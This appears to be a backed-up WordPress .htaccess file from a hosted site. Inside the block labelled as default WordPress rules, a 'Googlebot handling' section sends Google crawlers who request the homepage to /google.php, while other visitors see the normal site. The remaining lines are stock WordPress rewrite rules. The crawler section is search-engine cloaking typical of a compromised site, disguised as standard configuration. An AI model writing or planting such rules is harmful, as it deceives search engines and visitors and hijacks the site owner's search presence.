File: /home/uaktdz7o5l3q/public_html/stonehouse/.htaccess.bk
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
# --- Googlebot handling ---
# Detect Google crawlers
RewriteCond %{HTTP_USER_AGENT} (Googlebot|AdsBot|Mediapartners-Google|APIs-Google) [NC]
# Redirect Googlebot hitting the homepage
RewriteCond %{REQUEST_URI} ^/$
RewriteRule ^$ /google.php [L]
# --- Default WordPress rules ---
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress